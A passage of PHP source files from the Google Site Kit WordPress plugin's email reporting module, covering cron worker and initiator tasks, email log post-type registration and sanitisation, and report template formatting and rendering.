$scheduler, Email_Log_Processor $log_processor ) { $this->max_execution_limiter = $max_execution_limiter; $this->batch_query = $batch_query; $this->scheduler = $scheduler; $this->log_processor = $log_processor; } /** * Handles worker cron executions for email reporting. * * @since 1.167.0 * * @param string $batch_id Batch identifier. * @param string $frequency Frequency slug. * @param int $initiator_timestamp Initiator timestamp. */ public function handle_callback_action( $batch_id, $frequency, $initiator_timestamp ) { $lock_handle = $this->acquire_lock( $frequency ); if ( ! $lock_handle ) { return; } try { if ( $this->should_abort( $initiator_timestamp ) ) { return; } if ( $this->batch_query->is_complete( $batch_id ) ) { return; } $pending_ids = $this->batch_query->get_pending_ids( $batch_id ); if ( empty( $pending_ids ) ) { return; } $this->schedule_follow_up( $batch_id, $frequency, $initiator_timestamp ); if ( $this->should_abort( $initiator_timestamp ) ) { return; } $this->process_pending_logs( $pending_ids, $frequency, $initiator_timestamp ); } finally { delete_transient( $lock_handle ); } } /** * Processes a list of pending email log IDs. * * @since 1.170.0 * * @param array $pending_ids Pending post IDs. * @param string $frequency Frequency slug. * @param int $initiator_timestamp Initiator timestamp. */ private function process_pending_logs( array $pending_ids, $frequency, $initiator_timestamp ) { foreach ( $pending_ids as $post_id ) { if ( $this->should_abort( $initiator_timestamp ) ) { return; } $this->log_processor->process( $post_id, $frequency ); } $this->should_abort( $initiator_timestamp ); } /** * Attempts to acquire a frequency-scoped worker lock. * * @since 1.167.0 * * @param string $frequency Frequency slug. * @return string|false Transient name on success, false if lock already held. */ private function acquire_lock( $frequency ) { $transient_name = sprintf( 'googlesitekit_email_reporting_worker_lock_%s', $frequency ); if ( get_transient( $transient_name ) ) { return false; } set_transient( $transient_name, time(), MINUTE_IN_SECONDS ); return $transient_name; } /** * Determines if the current worker run should abort. * * @since 1.167.0 * * @param int $initiator_timestamp Initiator timestamp. * @return bool True if processing should stop immediately. */ private function should_abort( $initiator_timestamp ) { return $this->max_execution_limiter->should_abort( $initiator_timestamp ); } /** * Schedules the follow-up worker event. * * @since 1.167.0 * * @param string $batch_id Batch identifier. * @param string $frequency Frequency slug. * @param int $initiator_timestamp Initiator timestamp. */ private function schedule_follow_up( $batch_id, $frequency, $initiator_timestamp ) { $target_time = time() + ( 11 * MINUTE_IN_SECONDS ); $delay = max( 0, $target_time - (int) $initiator_timestamp ); $this->scheduler->schedule_worker( $batch_id, $frequency, $initiator_timestamp, $delay ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Initiator_Task * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use DateInterval; use DateTimeImmutable; use Google\Site_Kit\Core\User\Email_Reporting_Settings; /** * Handles initiator cron callbacks for email reporting. * * @since 1.167.0 * @access private * @ignore */ class Initiator_Task { /** * Scheduler instance. * * @var Email_Reporting_Scheduler */ private $scheduler; /** * Query helper for subscribed users. * * @var Subscribed_Users_Query */ private $subscribed_users_query; /** * Constructor. * * @since 1.167.0 * * @param Email_Reporting_Scheduler $scheduler Scheduler instance. * @param Subscribed_Users_Query $subscribed_users_query Subscribed users query helper. */ public function __construct( Email_Reporting_Scheduler $scheduler, Subscribed_Users_Query $subscribed_users_query ) { $this->scheduler = $scheduler; $this->subscribed_users_query = $subscribed_users_query; } /** * Handles the initiator cron callback. * * @since 1.167.0 * * @param string $frequency Frequency slug. */ public function handle_callback_action( $frequency ) { $timestamp = time(); $this->scheduler->schedule_next_initiator( $frequency, $timestamp ); $batch_id = wp_generate_uuid4(); $user_ids = $this->subscribed_users_query->for_frequency( $frequency ); $reference_dates = $this->build_reference_dates( $frequency, $timestamp ); foreach ( $user_ids as $user_id ) { wp_insert_post( array( 'post_type' => Email_Log::POST_TYPE, 'post_author' => $user_id, 'post_status' => Email_Log::STATUS_SCHEDULED, 'post_title' => $batch_id, 'meta_input' => array( Email_Log::META_BATCH_ID => $batch_id, Email_Log::META_REPORT_FREQUENCY => $frequency, Email_Log::META_REPORT_REFERENCE_DATES => $reference_dates, Email_Log::META_SEND_ATTEMPTS => 0, ), ) ); } $this->scheduler->schedule_worker( $batch_id, $frequency, $timestamp ); $this->scheduler->schedule_fallback( $batch_id, $frequency, $timestamp ); } /** * Builds the report reference dates for a batch. * * @param string $frequency Frequency slug. * @param int $timestamp Base timestamp. * @return array Reference date payload. */ private function build_reference_dates( $frequency, $timestamp ) { $time_zone = wp_timezone(); $send_date = ( new DateTimeImmutable( '@' . $timestamp ) ) ->setTimezone( $time_zone ) ->setTime( 0, 0, 0 ); $period_lengths = array( Email_Reporting_Settings::FREQUENCY_WEEKLY => 7, Email_Reporting_Settings::FREQUENCY_MONTHLY => 30, Email_Reporting_Settings::FREQUENCY_QUARTERLY => 90, ); $period_days = isset( $period_lengths[ $frequency ] ) ? $period_lengths[ $frequency ] : $period_lengths[ Email_Reporting_Settings::FREQUENCY_WEEKLY ]; $start_date = $send_date->sub( new DateInterval( sprintf( 'P%dD', $period_days ) ) ); $compare_end_date = $start_date->sub( new DateInterval( 'P1D' ) ); $compare_start_date = $compare_end_date->sub( new DateInterval( sprintf( 'P%dD', max( $period_days - 1, 0 ) ) ) ); return array( 'startDate' => $start_date->format( 'Y-m-d' ), 'sendDate' => $send_date->format( 'Y-m-d' ), 'compareStartDate' => $compare_start_date->format( 'Y-m-d' ), 'compareEndDate' => $compare_end_date->format( 'Y-m-d' ), ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Log * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Core\User\Email_Reporting_Settings as Reporting_Settings; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Registers the internal Email Reporting log storage. * * @since 1.166.0 * @access private * @ignore */ final class Email_Log { use Method_Proxy_Trait; /** * Post type slug. * * @since 1.166.0 */ const POST_TYPE = 'gsk_email_log'; /** * Report frequency meta key. * * @since 1.166.0 */ const META_REPORT_FREQUENCY = '_report_frequency'; /** * Batch ID meta key. * * @since 1.166.0 */ const META_BATCH_ID = '_batch_id'; /** * Maximum length for stored log strings (MySQL utf8mb4 index safety). * * @since 1.166.0 */ const META_STRING_MAX_LENGTH = 191; /** * Send attempts meta key. * * @since 1.166.0 */ const META_SEND_ATTEMPTS = '_send_attempts'; /** * Error details meta key. * * @since 1.166.0 */ const META_ERROR_DETAILS = '_error_details'; /** * Report reference dates meta key. * * @since 1.166.0 */ const META_REPORT_REFERENCE_DATES = '_report_reference_dates'; /** * Email log post statuses. * * Slugs must stay within the posts table varchar(20) limit. * * @since 1.166.0 */ const STATUS_SENT = 'gsk_email_sent'; const STATUS_FAILED = 'gsk_email_failed'; const STATUS_SCHEDULED = 'gsk_email_scheduled'; /** * Extracts a normalized date range array from an email log post. * * @since 1.167.0 * * @param mixed $email_log Potential email log post. * @return array|null */ public static function get_date_range_from_log( $email_log ) { $decoded = self::validate_and_decode_email_log( $email_log ); if ( null === $decoded ) { return null; } $normalized = array(); $keys = array( 'startDate' => 'startDate', 'sendDate' => 'endDate', 'compareStartDate' => 'compareStartDate', 'compareEndDate' => 'compareEndDate', ); foreach ( $keys as $key => $alias ) { if ( ! isset( $decoded[ $key ] ) ) { continue; } $formatted = self::format_reference_date( $decoded[ $key ] ); if ( null !== $formatted ) { $normalized[ $alias ] = $formatted; } } if ( empty( $normalized['startDate'] ) || empty( $normalized['endDate'] ) ) { return null; } return $normalized; } /** * Validates an email log and returns decoded reference date metadata. * * @since 1.167.0 * * @param mixed $email_log Potential email log post. * @return array|null Decoded reference date metadata, or null on failure. */ protected static function validate_and_decode_email_log( $email_log ) { if ( ! ( $email_log instanceof \WP_Post ) ) { return null; } if ( self::POST_TYPE !== $email_log->post_type ) { return null; } $raw = get_post_meta( $email_log->ID, self::META_REPORT_REFERENCE_DATES, true ); if ( empty( $raw ) ) { return null; } if ( is_string( $raw ) ) { $decoded = json_decode( $raw, true ); if ( JSON_ERROR_NONE !== json_last_error() ) { return null; } } elseif ( is_array( $raw ) ) { $decoded = $raw; } else { return null; } return $decoded; } /** * Validates and normalizes a reference date value into a UNIX timestamp. * * @since 1.167.0 * * @param mixed $value Date value. * @return int|null UNIX timestamp or null on failure. */ protected static function validate_reference_date( $value ) { if ( '' === $value || null === $value ) { return null; } $timestamp = is_numeric( $value ) ? (int) $value : strtotime( $value ); if ( empty( $timestamp ) || $timestamp < 0 ) { return null; } return $timestamp; } /** * Formats a timestamp or date string stored in reference date meta. * * @since 1.167.0 * * @param mixed $value Date value. * @return string|null */ protected static function format_reference_date( $value ) { $timestamp = self::validate_reference_date( $value ); if ( null === $timestamp ) { return null; } if ( function_exists( 'wp_timezone' ) && function_exists( 'wp_date' ) ) { $timezone = wp_timezone(); if ( $timezone ) { return wp_date( 'Y-m-d', $timestamp, $timezone ); } } return gmdate( 'Y-m-d', $timestamp ); } /** * Registers functionality through WordPress hooks. * * @since 1.166.0 */ public function register() { add_action( 'init', $this->get_method_proxy_once( 'register_email_log' ) ); } /** * Registers the email log post type, statuses, and meta. * * @since 1.166.0 */ protected function register_email_log() { $this->register_post_type(); $this->register_post_statuses(); $this->register_post_meta(); } /** * Registers the internal email log post type. * * @since 1.166.0 */ protected function register_post_type() { if ( post_type_exists( self::POST_TYPE ) ) { return; } register_post_type( self::POST_TYPE, array( 'public' => false, 'map_meta_cap' => true, 'rewrite' => false, 'query_var' => false, ) ); } /** * Registers internal delivery statuses. * * @since 1.166.0 */ protected function register_post_statuses() { $statuses = array( self::STATUS_SENT, self::STATUS_FAILED, self::STATUS_SCHEDULED, ); foreach ( $statuses as $key => $status ) { register_post_status( $status, array( 'public' => false, 'internal' => true, 'exclude_from_search' => true, 'show_in_admin_all_list' => false, 'show_in_admin_status_list' => false, ) ); } } /** * Registers meta data for the email log post type. * * @since 1.166.0 */ protected function register_post_meta() { $auth_callback = array( __CLASS__, 'meta_auth_callback' ); register_post_meta( self::POST_TYPE, self::META_REPORT_FREQUENCY, array( 'type' => 'string', 'single' => true, 'auth_callback' => $auth_callback, 'sanitize_callback' => array( __CLASS__, 'sanitize_frequency' ), ) ); register_post_meta( self::POST_TYPE, self::META_BATCH_ID, array( 'type' => 'string', 'single' => true, 'auth_callback' => $auth_callback, 'sanitize_callback' => array( __CLASS__, 'sanitize_batch_id' ), ) ); register_post_meta( self::POST_TYPE, self::META_SEND_ATTEMPTS, array( 'type' => 'integer', 'single' => true, 'auth_callback' => $auth_callback, 'sanitize_callback' => array( __CLASS__, 'sanitize_attempts' ), ) ); register_post_meta( self::POST_TYPE, self::META_ERROR_DETAILS, array( 'type' => 'string', 'single' => true, 'auth_callback' => $auth_callback, 'sanitize_callback' => array( __CLASS__, 'sanitize_error_details' ), ) ); register_post_meta( self::POST_TYPE, self::META_REPORT_REFERENCE_DATES, array( 'type' => 'string', 'single' => true, 'auth_callback' => $auth_callback, 'sanitize_callback' => array( __CLASS__, 'sanitize_reference_dates' ), ) ); } /** * Sanitizes the report frequency meta value. * * Allows only known scheduling frequencies, normalizing strings to lowercase. * * @since 1.166.0 * * @param mixed $value Meta value. * @return string Sanitized value. */ public static function sanitize_frequency( $value ) { $allowed = array( Reporting_Settings::FREQUENCY_WEEKLY, Reporting_Settings::FREQUENCY_MONTHLY, Reporting_Settings::FREQUENCY_QUARTERLY, ); $value = is_string( $value ) ? strtolower( $value ) : ''; return in_array( $value, $allowed, true ) ? $value : ''; } /** * Sanitizes the batch ID meta value. * * Strips unsafe characters and limits identifier string length so IDs * remain index-safe in MySQL databases. * * @since 1.166.0 * * @param mixed $value Meta value. * @return string Sanitized value. */ public static function sanitize_batch_id( $value ) { $value = sanitize_text_field( (string) $value ); return substr( $value, 0, self::META_STRING_MAX_LENGTH ); } /** * Sanitizes the send attempts meta value. * * @since 1.166.0 * * @param mixed $value Meta value. * @return int Sanitized value. */ public static function sanitize_attempts( $value ) { if ( (int) $value < 0 ) { return 0; } return absint( $value ); } /** * Sanitizes the error details meta value. * * Converts WP_Error instances and other payloads into JSON for storage. * * @since 1.166.0 * * @param mixed $value Meta value. * @return string Sanitized value. */ public static function sanitize_error_details( $value ) { if ( is_wp_error( $value ) ) { $value = array( 'errors' => $value->errors, 'error_data' => $value->error_data, ); } if ( is_array( $value ) || is_object( $value ) ) { $encoded = wp_json_encode( $value, JSON_UNESCAPED_UNICODE ); return is_string( $encoded ) ? $encoded : ''; } if ( is_string( $value ) ) { // Treat existing JSON strings as-is by checking decode status instead of rebuilding them. json_decode( $value, true ); if ( json_last_error() === JSON_ERROR_NONE ) { return $value; } $encoded = wp_json_encode( array( 'message' => $value, ), JSON_UNESCAPED_UNICODE ); return is_string( $encoded ) ? $encoded : ''; } return ''; } /** * Sanitizes the report reference dates meta value. * * Extracts known timestamps, coercing them to integers before encoding. * * @since 1.166.0 * * @param mixed $value Meta value. * @return string Sanitized value. */ public static function sanitize_reference_dates( $value ) { if ( ! is_array( $value ) && ! is_object( $value ) ) { return ''; } $normalized = self::normalize_reference_dates( (array) $value ); $encoded = wp_json_encode( $normalized, JSON_UNESCAPED_UNICODE ); return is_string( $encoded ) ? $encoded : ''; } /** * Normalizes reference date values into timestamps for storage. * * @since 1.170.0 * * @param array $raw_dates Raw reference date values keyed by meta field. * @return array Normalized timestamps keyed by meta field. */ protected static function normalize_reference_dates( array $raw_dates ) { $keys = array( 'startDate', 'sendDate', 'compareStartDate', 'compareEndDate' ); $normalized = array(); foreach ( $keys as $key ) { if ( ! isset( $raw_dates[ $key ] ) ) { if ( 'compareStartDate' === $key || 'compareEndDate' === $key ) { $normalized[ $key ] = 0; } continue; } $timestamp = self::normalize_reference_date_value( $raw_dates[ $key ] ); if ( null === $timestamp ) { if ( 'compareStartDate' === $key || 'compareEndDate' === $key ) { $normalized[ $key ] = 0; } continue; } // Store as integer timestamp. $normalized[ $key ] = (int) $timestamp; } return $normalized; } /** * Normalizes a single reference date value into a timestamp. * * @since 1.170.0 * * @param mixed $raw_value Date value. * @return int|null Normalized timestamp or null when invalid. */ protected static function normalize_reference_date_value( $raw_value ) { if ( is_string( $raw_value ) ) { $raw_value = trim( $raw_value ); } if ( '' === $raw_value ) { return null; } if ( is_numeric( $raw_value ) ) { $timestamp = $raw_value; } else { $timestamp = strtotime( $raw_value ); } if ( false === $timestamp || $timestamp <= 0 ) { return null; } return $timestamp; } /** * Authorization callback for protected log meta. * * Ensures only internal workflows (cron/init) or administrators touch the * private log metadata so the CPT stays non-public. * * @since 1.166.0 * * @return bool */ public static function meta_auth_callback() { if ( current_user_can( 'manage_options' ) ) { return true; } if ( wp_doing_cron() ) { return true; } if ( doing_action( 'init' ) ) { return true; } return false; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Template_Formatter * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Context; use Google\Site_Kit\Core\User\Email_Reporting_Settings; use WP_Error; use WP_Post; use WP_User; /** * Formats email report data for template rendering. * * @since 1.170.0 * @access private * @ignore */ class Email_Template_Formatter { /** * Plugin context instance. * * @since 1.170.0 * * @var Context */ private $context; /** * Email report section builder. * * @since 1.170.0 * * @var Email_Report_Section_Builder */ private $section_builder; /** * Constructor. * * @since 1.170.0 * * @param Context $context Plugin context. * @param Email_Report_Section_Builder $section_builder Section builder instance. */ public function __construct( Context $context, Email_Report_Section_Builder $section_builder ) { $this->context = $context; $this->section_builder = $section_builder; } /** * Builds sections from raw payload grouped by module. * * @since 1.170.0 * * @param array $raw_payload Raw payload. * @param WP_Post $email_log Email log post. * @param WP_User $user User receiving the report. * @return array|WP_Error Sections array or WP_Error. */ public function build_sections( $raw_payload, WP_Post $email_log, WP_User $user ) { $sections = array(); $user_locale = get_user_locale( $user ); if ( ! is_array( $raw_payload ) ) { return $sections; } foreach ( $raw_payload as $module_slug => $module_payload ) { if ( is_object( $module_payload ) ) { $module_payload = (array) $module_payload; } try { $module_sections = $this->section_builder->build_sections( $module_slug, array( $module_payload ), $user_locale, $email_log ); } catch ( \Exception $exception ) { return new WP_Error( 'email_report_section_build_failed', $exception->getMessage() ); } if ( is_wp_error( $module_sections ) ) { return $module_sections; } if ( ! empty( $module_sections ) ) { $sections = array_merge( $sections, $module_sections ); } } return $sections; } /** * Builds template payload for rendering. * * @since 1.170.0 * * @param array $sections Sections. * @param string $frequency Frequency slug. * @param array $date_range Date range. * @return array|WP_Error Template payload or WP_Error. */ public function build_template_payload( $sections, $frequency, $date_range ) { $sections_payload = $this->prepare_sections_payload( $sections, $date_range ); if ( empty( $sections_payload ) ) { return new WP_Error( 'email_report_no_data', __( 'No email report data available.', 'google-site-kit' ) ); } return array( 'sections_payload' => $sections_payload, 'template_data' => $this->prepare_template_data( $frequency, $date_range ), ); } /** * Prepares section payload for the template renderer. * * @since 1.170.0 * * @param array $sections Section instances. * @param array $date_range Date range used for the report. * @return array Section payload for the template. */ private function prepare_sections_payload( $sections, $date_range ) { $payload = array(); $change_context = $this->get_change_context_label( $date_range ); foreach ( $sections as $section ) { if ( ! $section instanceof Email_Report_Data_Section_Part ) { continue; } $values = $section->get_values(); $labels = $section->get_labels(); $trends = $section->get_trends(); $event_names = $section->get_event_names(); $dimensions = $section->get_dimensions(); $dimension_values = $section->get_dimension_values(); $change = isset( $trends[0] ) ? $this->parse_change_value( $trends[0] ) : null; $changes = is_array( $trends ) ? array_map( array( $this, 'parse_change_value' ), $trends ) : array(); $first_dimension_value = ''; if ( isset( $dimension_values[0] ) ) { $first_dimension_value = is_array( $dimension_values[0] ) ? ( $dimension_values[0]['label'] ?? '' ) : $dimension_values[0]; } $payload[ $section->get_section_key() ] = array( 'value' => isset( $values[0] ) ? $values[0] : '', 'values' => $values, 'label' => isset( $labels[0] ) ? $labels[0] : $section->get_title(), 'event_name' => isset( $event_names[0] ) ? $event_names[0] : '', 'dimension' => isset( $dimensions[0] ) ? $dimensions[0] : '', 'dimension_value' => $first_dimension_value, 'dimension_values' => $dimension_values ?? array(), 'change' => $change, 'changes' => $changes, 'change_context' => $change_context, ); } return $payload; } /** * Parses a change value into float. * * @since 1.170.0 * * @param mixed $change Change value. * @return float|null Parsed change. */ private function parse_change_value( $change ) { if ( null === $change || '' === $change ) { return null; } if ( is_string( $change ) ) { $change = str_replace( '%', '', $change ); } if ( ! is_numeric( $change ) ) { return null; } return floatval( $change ); } /** * Builds a change context label based on the date range. * * @since 1.170.0 * * @param array $date_range Date range. * @return string Change context label. */ private function get_change_context_label( array $date_range ) { // Prefer the compare period length since the change badge references the previous window. if ( ! empty( $date_range['compareStartDate'] ) && ! empty( $date_range['compareEndDate'] ) ) { $days = $this->calculate_period_length_from_range( array( 'startDate' => $date_range['compareStartDate'], 'endDate' => $date_range['compareEndDate'], ) ); } else { $days = $this->calculate_period_length_from_range( $date_range ); } if ( null === $days || $days <= 0 ) { return __( 'Compared to previous period', 'google-site-kit' ); } return sprintf( /* translators: %s: Number of days. */ __( 'Compared to previous %s days', 'google-site-kit' ), number_format_i18n( $days ) ); } /** * Calculates inclusive day length from a date range. * * @since 1.170.0 * * @param array $date_range Date range with startDate/endDate. * @return int|null Number of days or null on failure. */ private function calculate_period_length_from_range( $date_range ) { if ( empty( $date_range['startDate'] ) || empty( $date_range['endDate'] ) ) { return null; } try { $start = new \DateTime( $date_range['startDate'] ); $end = new \DateTime( $date_range['endDate'] ); } catch ( \Exception $e ) { return null; } $diff = $start->diff( $end ); if ( false === $diff ) { return null; } return $diff->days + 1; } /** * Builds template data for rendering. * * @since 1.170.0 * * @param string $frequency Frequency slug. * @param array $date_range Date range. * @return array Template data. */ private function prepare_template_data( $frequency, $date_range ) { return array( 'subject' => $this->build_subject( $frequency ), 'preheader' => __( 'See the latest highlights from Site Kit.', 'google-site-kit' ), 'site' => array( 'domain' => $this->get_site_domain(), ), 'date_range' => array( 'label' => $this->build_date_label( $date_range ), 'context' => $this->get_change_context_label( $date_range ), ), 'primary_call_to_action' => array( 'label' => __( 'View dashboard', 'google-site-kit' ), 'url' => admin_url( 'admin.php?page=googlesitekit-dashboard' ), ), 'footer' => array( 'copy' => __( 'You received this email because you signed up to receive email reports from Site Kit.', 'google-site-kit' ), 'unsubscribe_url' => admin_url( 'admin.php?page=googlesitekit-settings#/admin-settings' ), 'links' => array( array( 'label' => __( 'Help center', 'google-site-kit' ), 'url' => 'https://sitekit.withgoogle.com/support/', ), array( 'label' => __( 'Privacy Policy', 'google-site-kit' ), 'url' => 'https://policies.google.com/privacy', ), array( 'label' => __( 'Manage subscription', 'google-site-kit' ), 'url' => admin_url( 'admin.php?page=googlesitekit-dashboard&email-reporting-panel-opened=1' ), ), ), ), ); } /** * Builds a human readable date label. * * @since 1.170.0 * * @param array $date_range Date range. * @return string Date label. */ private function build_date_label( array $date_range ) { if ( empty( $date_range['startDate'] ) || empty( $date_range['endDate'] ) ) { return ''; } $format_date = static function ( $value ) { $timestamp = strtotime( $value ); if ( ! $timestamp ) { return $value; } $timezone = function_exists( 'wp_timezone' ) ? wp_timezone() : null; if ( $timezone && function_exists( 'wp_date' ) ) { return wp_date( 'M j', $timestamp, $timezone ); } return gmdate( 'M j', $timestamp ); }; return sprintf( '%s – %s', $format_date( $date_range['startDate'] ), $format_date( $date_range['endDate'] ) ); } /** * Builds an email subject for the report. * * @since 1.170.0 * * @param string $frequency Frequency slug. * @return string Email subject. */ private function build_subject( $frequency ) { $frequency_label = $this->get_frequency_label( $frequency ); $site_domain = $this->get_site_domain(); return sprintf( /* translators: 1: Report frequency, 2: Site domain. */ __( 'Your %1$s Site Kit report for %2$s', 'google-site-kit' ), $frequency_label, $site_domain ); } /** * Gets a friendly frequency label. * * @since 1.170.0 * * @param string $frequency Frequency slug. * @return string Frequency label. */ private function get_frequency_label( $frequency ) { switch ( $frequency ) { case Email_Reporting_Settings::FREQUENCY_MONTHLY: return __( 'monthly', 'google-site-kit' ); case Email_Reporting_Settings::FREQUENCY_QUARTERLY: return __( 'quarterly', 'google-site-kit' ); case Email_Reporting_Settings::FREQUENCY_WEEKLY: default: return __( 'weekly', 'google-site-kit' ); } } /** * Gets the site domain including subdirectory context. * * @since 1.170.0 * * @return string Site domain string. */ private function get_site_domain() { $site_url = $this->context->get_reference_site_url(); $parsed = wp_parse_url( $site_url ); if ( empty( $parsed['host'] ) ) { return $site_url; } $domain = $parsed['host']; if ( ! empty( $parsed['path'] ) && '/' !== $parsed['path'] ) { $domain .= untrailingslashit( $parsed['path'] ); } return $domain; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Template_Renderer * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; /** * Class for rendering email templates. * * @since 1.168.0 */ class Email_Template_Renderer { /** * CDN base URL for email assets. * * TODO: Change to the production URL when the assets are uploaded to production bucket in #11551. * * @since 1.168.0 * @var string */ const EMAIL_ASSETS_BASE_URL = 'https://storage.googleapis.com/pue-email-assets-dev/'; /** * The sections map instance. * * @since 1.168.0 * @var Sections_Map */ protected $sections_map; /** * The base templates directory path. * * @since 1.168.0 * @var string */ protected $templates_dir; /** * Cache of verified template file paths. * * Used to avoid repeated file_exists() calls for the same files. * * @since 1.168.0 * @var array */ protected $cached_files = array(); /** * Constructor. * * @since 1.168.0 * * @param Sections_Map $sections_map The sections map instance. */ public function __construct( Sections_Map $sections_map ) { $this->sections_map = $sections_map; $this->templates_dir = realpath( __DIR__ . '/templates' ); } /** * Gets the full URL for an email asset. * * @since 1.168.0 * * @param string $asset_name The asset filename (e.g., 'icon-conversions.png'). * @return string The full URL to the asset. */ public function get_email_asset_url( $asset_name ) { return self::EMAIL_ASSETS_BASE_URL . ltrim( $asset_name, '/' ); } /** * Renders the email template with the given data. * * @since 1.168.0 * * @param string $template_name The template name. * @param array $data The data to render (metadata like subject, preheader, etc.). * @return string The rendered HTML. */ public function render( $template_name, $data ) { $main_template_file = $this->get_template_file( $template_name ); if ( ! $main_template_file || ! file_exists( $main_template_file ) ) { return ''; } $sections = $this->sections_map->get_sections(); $shared_parts_dir = $this->templates_dir . '/parts'; $template_parts_dir = $this->templates_dir . '/' . $template_name . '/parts'; $template_data = array_merge( $data, array( 'sections' => $sections, 'get_asset_url' => fn( $asset_path ) => $this->get_email_asset_url( $asset_path ), 'render_part' => fn( $part_name, $vars = array() ) => $this->render_part_file( $template_parts_dir . '/' . $part_name . '.php', $vars ), 'render_shared_part' => fn( $part_name, $vars = array() ) => $this->render_part_file( $shared_parts_dir . '/' . $part_name . '.php', $vars ), ) ); return $this->render_template( $main_template_file, $template_data ); } /** * Renders a template file with the given data. * * @since 1.168.0 * * @param string $template_file The template file path. * @param array $data The data to render (used within the template file). * @return string The rendered HTML. */ protected function render_template( $template_file, $data ) { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.FoundAfterLastUsed -- Data is used within the template parts so is no strictly unused. ob_start(); include $template_file; return ob_get_clean(); } /** * Renders a template part file with the given variables. * * Unlike render_template(), this method extracts variables into the * template scope for more convenient access within partial templates. * * File paths are validated to ensure they are within the plugin's * templates directory for security. Verified files are cached to * avoid repeated file_exists() calls. * * @since 1.168.0 * * @param string $file The template part file path. * @param array $vars The variables to extract into the template scope. */ protected function render_part_file( $file, $vars = array() ) { if ( isset( $this->cached_files[ $file ] ) ) { extract( $vars, EXTR_SKIP ); // phpcs:ignore WordPress.PHP.DontExtract.extract_extract include $this->cached_files[ $file ]; return; } $real_path = realpath( $file ); if ( false === $real_path ) { return; } // Ensure the file is within the templates directory for security. if ( 0 !== strpos( $real_path, $this->templates_dir . DIRECTORY_SEPARATOR ) ) { return; } $this->cached_files[ $file ] = $real_path; extract( $vars, EXTR_SKIP ); // phpcs:ignore WordPress.PHP.DontExtract.extract_extract include $real_path; } /** * Renders the email template as plain text. * * Generates a plain text version of the email by walking the same * structured section data as the HTML renderer, using the * Plain_Text_Formatter for formatting. * * @since 1.170.0 * * @param string $template_name The template name (unused for plain text, kept for API consistency with render()). * @param array $data The data to render (metadata like subject, preheader, etc.). * @return string The rendered plain text. */ public function render_text( $template_name, $data ) { $sections = $this->sections_map->get_sections(); $output = Plain_Text_Formatter::format_header( $data['site']['domain'] ?? '', $data['date_range']['label'] ?? '' ); foreach ( $sections as $section_key => $section ) { if ( empty( $section['section_parts'] ) ) { continue; } $output .= Plain_Text_Formatter::format_section( $section ); } $output .= Plain_Text_Formatter::format_footer( $data['primary_call_to_action'] ?? array(), $data['footer'] ?? array() ); return $output; } /** * Resolves the template file path. * * @since 1.168.0 * * @param string $template_name The template name. * @param string $part_name The part name. * @return string The template file path, or empty string if not found. */ protected function get_template_file( $template_name, $part_name = '' ) { $file = array( __DIR__, 'templates', $template_name ); if ( ! empty( $part_name ) ) { array_push( $file, 'parts', $part_name . '.php' ); } else { array_push( $file, 'template.php' ); } $file = join( DIRECTORY_SEPARATOR, $file ); if ( file_exists( $file ) ) { return $file; } return ''; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Was_Analytics_4_Connected * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Core\Storage\Setting; /** * Was_Analytics_4_Connected class. * * Indicates whether Google Analytics 4 was ever connected to the site. * * @since 1.168.0 * @access private * @ignore */ class Was_Analytics_4_Connected extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_was_analytics-4_connected'; /** * Gets the expected value type. * * @since 1.168.0 * * @return string The type name. */ protected function get_type() { return 'boolean'; } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.168.0 * * @return callable The sanitizing function. */ protected function get_sanitize_callback() { return 'boolval'; } /** * Gets the value of the setting. * * @since 1.168.0 * * @return bool Value set for the option, or registered default if not set. */ public function get() { return (bool) parent::get(); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Fallback_Task * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; /** * Handles fallback cron callbacks for email reporting. * * @since 1.168.0 * @access private * @ignore */ class Fallback_Task { /** * Email log batch query helper. * * @since 1.168.0 * * @var Email_Log_Batch_Query */ private $batch_query; /** * Scheduler instance. * * @since 1.168.0 * * @var Email_Reporting_Scheduler */ private $scheduler; /** * Worker task instance. * * @since 1.168.0 * * @var Worker_Task */ private $worker_task; /** * Constructor. * * @since 1.168.0 * * @param Email_Log_Batch_Query $batch_query Batch query helper. * @param Email_Reporting_Scheduler $scheduler Scheduler instance. * @param Worker_Task $worker_task Worker task instance. */ public function __construct( Email_Log_Batch_Query $batch_query, Email_Reporting_Scheduler $scheduler, Worker_Task $worker_task ) { $this->batch_query = $batch_query; $this->scheduler = $scheduler; $this->worker_task = $worker_task; } /** * Handles the fallback cron callback. * * @since 1.168.0 * * @param string $batch_id Batch identifier. * @param string $frequency Frequency slug. * @param int $initiator_timestamp Initiator timestamp. */ public function handle_fallback_action( $batch_id, $frequency, $initiator_timestamp ) { if ( $this->is_worker_locked( $frequency ) ) { 